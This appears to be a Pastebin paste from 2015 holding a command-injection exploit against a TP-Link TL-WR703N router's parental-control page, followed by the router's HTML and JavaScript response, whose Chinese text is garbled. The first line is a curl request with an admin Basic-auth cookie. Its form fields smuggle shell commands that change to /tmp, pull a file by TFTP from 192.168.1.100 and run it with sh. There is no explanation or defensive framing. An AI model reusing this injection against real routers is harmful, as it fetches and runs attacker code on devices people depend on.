Guest User

w793n v1.7 exploit command output

a guest
Dec 13th, 2015
293
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. samantha@samantha-desktop:/tftpboot$ curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.100;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
  2. <script type="text/javascript">
  3. var parent_ctrl_global_cfg_dyn_array = new Array(
  4. 1,
  5. 0,
  6. "00-00-00-00-00-02",
  7. "00-1c-c0-da-f3-a7",
  8. 0,0 );
  9. </SCRIPT>
  10. <script type="text/javascript">
  11. var parent_ctrl_data_param = new Array(
  12. "00-00-00-00-00-01", "test", 255, "", 1,
  13. 0,0 );
  14. </SCRIPT>
  15. <script type="text/javascript">
  16. var parent_ctrl_page_param = new Array(
  17. 1, 0, 1, 5, 1,
  18. 0,0 );
  19. </SCRIPT>
  20. <META http-equiv=Content-Type content="text/html; charset=gb2312">
  21. <HTML>
  22. <HEAD><TITLE>TL-WR703N</TITLE>
  23. <META http-equiv=Pragma content=no-cache>
  24. <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
  25. <LINK href="/dynaform/css_main.css" rel=stylesheet type="text/css">
  26. <SCRIPT language="javascript" src="/dynaform/common.js" type="text/javascript"></SCRIPT>
  27. <SCRIPT language="javascript" type="text/javascript"><!--
  28. if(window.parent == window){window.location.href="http://192.168.1.1";}
  29. function Click(){ return false;}
  30. document.oncontextmenu=Click;
  31. //--></SCRIPT>
  32.  
  33. <META http-equiv=Content-Type content="text/html; charset=gb2312">
  34. <script language="Javascript"><!--
  35. var LP = location.pathname;
  36. function doAll(val){if(val=="DelAll"){if(!confirm("ɾ��������Ŀ?")) return;} location.href="ParentCtrlRpm.htm?doAll="+val+"&Page="+curPage;}
  37. function doAdd(nPage){location.href="ParentCtrlRpm.htm?Add=Add&Page="+nPage;}
  38. function doPage(nPage){location.href="ParentCtrlRpm.htm?Page="+nPage;}
  39. function doHelp(){location.href="/help/ParentCtrlHelpRpm.htm";}
  40.  
  41. function ResetStatus(strInfo){window.status='';return true;}
  42. /*
  43. function enableId(id){
  44.     var enable;
  45.     if(document.forms[0].elements['enable'+id].checked == true)
  46.         enable = 1;
  47.     else
  48.         enable = 0;
  49.     location.href = LP + "?enable=" + enable + "&enableId=" + id +"&Page=" + parent_ctrl_page_param[1];
  50. }
  51. */
  52.  
  53. function doSave()
  54. {
  55.     var DF = document.forms[0];
  56.     var bEnabled = DF.elements['ctrl_enable'][0].checked?0:1;
  57.     //var bMode = DF.elements['mode_choose'][0].checked?0:1;
  58.     var pMac =  DF.elements['parent_mac_addr'].value;
  59.     //if (bMode == 0)
  60.     //{
  61.         if (false == is_macaddr(document.forms[0].parent_mac_addr.value))
  62.         {
  63.             var element = document.forms[0].parent_mac_addr;
  64.             if(element)
  65.             {
  66.                 element.focus();
  67.                 element.select();
  68.             }
  69.             return false;
  70.         }
  71.     //}
  72.     location.href = LP + "?ctrl_enable=" + bEnabled + "&parent_mac_addr=" + pMac + "&Page=" + parent_ctrl_page_param[0];
  73.     return true;
  74. }
  75. /*
  76. function doSwitchTr()
  77. {
  78.     str=style_display_on();
  79.     document.getElementById("set_pmac").style.display=(document.forms[0].mode_choose[0].checked)?str:"none";
  80. }
  81. */
  82. function doWriteMac()
  83. {
  84.     document.forms[0].parent_mac_addr.value = document.forms[0].man_mac.value.toUpperCase();
  85. }
  86. //--></script>
  87. </head>
  88. <body><center><form action="ParentCtrlRpm.htm" enctype="multipart/form-data" method="get" >
  89. <table width="662" border="0" cellspacing="0" cellpadding="0">
  90. <tr><td width="7" class="title"><img src="/images/arc.gif" width="7" height="24"></td>
  91. <td width="640" align="left" valign="middle" class="title">�ҳ���������</td></tr>
  92. <tr><td colspan="2"><table width="662" border="0" cellspacing="0" cellpadding="0">
  93. <tr><td class="vline" rowspan="15"><br></td><td width="660">
  94. <table width="610" border="0" align="center" cellpadding="0" cellspacing="0" class="space">
  95. <tr><td>��Ϊ�ҳ���������ͨ����ҳ���������ã�����С����������Ϊ��ʹ��С����PCֻ����ָ��ʱ������ָ������վ��</td></tr>
  96. <tr><td><font color="#ff0000">���ڹ����б��еķǼҳ�PC���޷�������</font></td></tr>
  97. </table>
  98. <table width="610" border="1" align="center" cellpadding="0" cellspacing="0" class="space">
  99. <tr><td>
  100. <table align="center" border="0" width="590" cellspacing="2" cellpadding="2" class="space">
  101. <TR>
  102.     <TD width="140">�ҳ����ƣ�</TD>
  103.     <TD><input name="ctrl_enable" type="radio" value="0">������&nbsp;&nbsp;<input name="ctrl_enable" type="radio" value="1" Checked>����</TD>
  104. </TR>
  105. <!--
  106. <tr><td>&nbsp;</td></tr>
  107. <tr><td width="590" align="left" colspan="2">&nbsp;&nbsp;ģʽѡ��</td></tr>
  108. <tr>
  109.     <td colspan="2" align="left">&nbsp;&nbsp;<input name="mode_choose" type="radio" value="0" onclick="doSwitchTr(0)">��Ҫ���üҳ�PC��MAC��ַ����������������PC</td>
  110. </tr>
  111. <tr>
  112.     <td colspan="2" align="left">&nbsp;&nbsp;<input name="mode_choose" type="radio" value="1" onclick="doSwitchTr(1)" Checked>��Ҫ�ڸ߼�����������С��PC��MAC��ַ</td>
  113. </tr>
  114. -->
  115. <tr id="set_pmac">
  116.     <td>�ҳ�PC��MAC��ַ��</td>
  117.     <td><input name="parent_mac_addr" type="text" class="text" value="" size="17" maxlength="17"></td>
  118. </tr>
  119. <tr id="manPc_mac">
  120.     <td>��ǰ����PC��MAC��ַ��</td>
  121.     <td><input name="man_mac" type="text" class="text" value="" size="17" maxlength="17" disabled>&nbsp;&nbsp;<input name="writeMac" type="button" class="button" id="writeMac" onClick="doWriteMac();" value="��Ϊ�ҳ�PC"  ></td>
  122. </tr>
  123.  
  124.  
  125. <tr><td align="left" colspan="2">&nbsp;&nbsp;<input type="button" value="�� ��" name="save" class="button" onclick="doSave();"></td></tr>
  126. </table>
  127. </td></tr>
  128. </table>
  129. <table width="610" border="1" align="center" cellpadding="0" cellspacing="0" class="space">
  130. <tr>
  131.     <td align="center">ID</td>
  132.     <td align="center" width="150">MAC ��ַ</td>
  133.     <td align="center" nowrap>��վ�б�</td>
  134.     <td align="center" nowrap>�ճ̼ƻ�</td>
  135.     <td align="center" nowrap>״̬</td>
  136.     <td align="center" nowrap>����</td>
  137. </tr>
  138. <script language="JavaScript">
  139. if (parent_ctrl_page_param[2] > 0)
  140. {
  141.     var row = 0;
  142.     var idStart = (parent_ctrl_page_param[0] - 1) * 8;
  143.     for(var i = 0; i < parent_ctrl_page_param[2]; i++)
  144.     {
  145.     idStart++;
  146.     row = i * parent_ctrl_page_param[3];
  147.  
  148.     document.write('<tr id="tr'+idStart+'"><td align="center">' + idStart + '</td>');
  149.     if (parent_ctrl_data_param[row] == "")
  150.         document.write('<td align="center">' + '��' + parent_ctrl_global_cfg_dyn_array[2] + '</td>');
  151.     else
  152.         document.write('<td align="center">' + parent_ctrl_data_param[row] + '</td>');
  153.        
  154.     document.write('<td align="center">' + parent_ctrl_data_param[row+1] + '</td>');
  155.  
  156.     if (parent_ctrl_data_param[row+2]==255)
  157.         document.write('<td align="center">' + '����' + '</td>');
  158.     else
  159.         document.write('<td align="center">' + parent_ctrl_data_param[row+3] + '</td>');
  160.     if (parent_ctrl_data_param[row+4] == 0)
  161.         document.write('<td align="center">' + 'ʧЧ' + '</td>');
  162.     else
  163.         document.write('<td align="center">' + '��Ч' + '</td>');
  164.     document.write('<td align="center"><a href=\"ParentCtrlRpm.htm?Modify=' +
  165.                     i+'&Page='+parent_ctrl_page_param[0]+
  166.                     '\" OnMouseOver=\"return ResetStatus(\'modify\');\">�༭</a>&nbsp;<a href=\"ParentCtrlRpm.htm?Del='+
  167.                     i+'&Page='+parent_ctrl_page_param[0]+
  168.                     '\" OnMouseOver=\"return ResetStatus(\'delete\');\">ɾ��</a></td></tr>');
  169.     }
  170.     }
  171. else
  172. {
  173.     document.write('<tr><td align="center" colspan=8>��ǰ�б�Ϊ��</td>');
  174. }
  175. </script>
  176. </table>
  177. <table width="610" align="center" border="0" cellpadding="0" cellspacing="0" class="space">
  178. <tr><td colspan="3" width="608">
  179. <input type="button" value="���ӵ�����Ŀ" name="Add" class="button" onClick="doAdd(curPage);">
  180. <input type="button" value="ʹ������Ŀ��Ч" name="EnAll" class="button" onClick="doAll('EnAll');">
  181. <input type="button" value="ʹ������ĿʧЧ" name="DisAll" class="button" onClick="doAll('DisAll');">
  182. <input type="button" value="ɾ��������Ŀ" name="DelAll" class="button" onClick="doAll('DelAll');">
  183. <!--<input type="button" value="����ָ����Ŀ" name="Find" class="button" onClick="location.href=LP + '?Find=Find';">-->
  184. </td></tr>
  185. </table>
  186. </td><td class="vline" rowspan="15"><br> </td></tr>
  187. <tr><td class="hline"><img src="/images/empty.gif" width="1" height="1"></td></tr>
  188. <tr><td height="30" class="tail">&nbsp;
  189. <input name="previous" type="button" class="button" onClick="doPage(prePage);" value="��һҳ" Disabled>
  190. &nbsp;<input name="next" type="button" class="button" onClick="doPage(NextPage);" value="��һҳ" Disabled>
  191. &nbsp;��ǰ��
  192. <select onchange="doPage(document.forms[0].selPage.value);" size="1" name="selPage" class="list">
  193. <script language="JavaScript">
  194. var pageNum = parent_ctrl_page_param[4]/8 + 1;
  195. var pIndex = 1;
  196. do
  197. {
  198.     document.write("<option value='" + pIndex + "' selected>"+ pIndex +"</option>");
  199. }while(++pIndex < pageNum)
  200. </script>
  201. </select>
  202. ҳ
  203. &nbsp; <input name="Page" type="hidden" value="1">
  204. <input name="help" type="button" class="button" onClick="doHelp();" value="�� ��"></td></tr>
  205. <tr><td class="hline"><img src="/images/empty.gif" width="1" height="1"></td></tr>
  206. </table></td></tr></table></form></center>
  207. <script language="JavaScript">
  208. var curPage = parent_ctrl_page_param[0];
  209. var prePage = (parent_ctrl_page_param[0] == 1)?1:parent_ctrl_page_param[0]-1;
  210. var NextPage = parent_ctrl_page_param[0]+1;
  211. function style_display_on()
  212. {
  213.     if (window.ActiveXObject)
  214.     { // IE
  215.         return "block";
  216.     }
  217.     else if (window.XMLHttpRequest)
  218.     { // Mozilla, Safari,...
  219.         return "table-row";
  220.     }
  221. }
  222. if (parent_ctrl_global_cfg_dyn_array[0] == 1)   document.forms[0].ctrl_enable[1].checked =true;
  223. else document.forms[0].ctrl_enable[0].checked =true;
  224. document.forms[0].parent_mac_addr.value = parent_ctrl_global_cfg_dyn_array[2];
  225. document.forms[0].Page.value = curPage;
  226. document.forms[0].previous.disabled = (parent_ctrl_page_param[0] < 2)? true : false;
  227. document.forms[0].next.disabled = (parent_ctrl_page_param[1] > 0)? false : true;
  228. document.forms[0].EnAll.disabled = (parent_ctrl_page_param[2] > 0)? false : true;
  229. document.forms[0].DisAll.disabled = (parent_ctrl_page_param[2] > 0)? false : true;
  230. document.forms[0].DelAll.disabled = (parent_ctrl_page_param[2] > 0)? false : true;
  231. //document.forms[0].Find.disabled = (parent_ctrl_page_param[2] > 0)?false:true;
  232.  
  233. document.forms[0].selPage.value = curPage;
  234. document.forms[0].man_mac.value = parent_ctrl_global_cfg_dyn_array[3].toUpperCase();
  235. </script>
  236. </body><head><meta http-equiv="pragma" content="no-cache"></head></html>
RAW Paste Data